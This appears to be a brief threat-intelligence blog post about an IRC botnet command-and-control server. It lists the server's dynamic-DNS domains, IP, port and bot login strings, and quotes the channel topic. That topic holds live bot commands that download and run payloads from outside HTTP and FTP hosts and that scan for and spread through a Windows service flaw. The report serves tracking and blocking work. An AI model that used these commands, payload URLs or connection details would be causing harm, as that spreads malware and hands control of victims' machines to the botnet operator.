pantylost.mooo.com( botnet hosted in China Beijing Chinanet Gansu Province Networ

Botnet C&C irc
pantylost.mooo.com ip: 60.165.98.198
marinehh.twilightparadox.com ip: 60.165.98.198
stockingag.jumpingcrab.com ip: 60.165.98.198
pantylost.crabdance.com ip: 60.165.98.198
addr: onthebreak.UglyAs.com ip: 60.165.98.198
headmefc.AsSexyAs.com ip: 60.165.98.198
computercc.ignorelist.com ip: 60.165.98.198
sandtp.chickenkiller.com ip: 60.165.98.198
greenbarc.IsTheBe.st ip: 60.165.98.198
ringc.strangled.net ip: 60.165.98.198

60.165.98.198:8684
NICK [N00_USA_XP_39922187]
USER SP2-917 * 0 :COMPUTERNAME
Now talking in #blue3
Topic is ‘|.ddosstop -s|.stop -s|.patcher http://58.240.104.57:9008/logo.gif 0 -s|.shttp ftp://ccc:1@60.10.179.100:6054/282.gif fewh.exe -s|.asc svrsvc_SP2 100 5 9999 1 -b -e -r -s|.asc svrsvc_SP2 50 5 9999 0 -b -r -s|.join #sd3 -s’

infos about hosting:
http://whois.domaintools.com/60.165.98.198

Categories: Uncategorized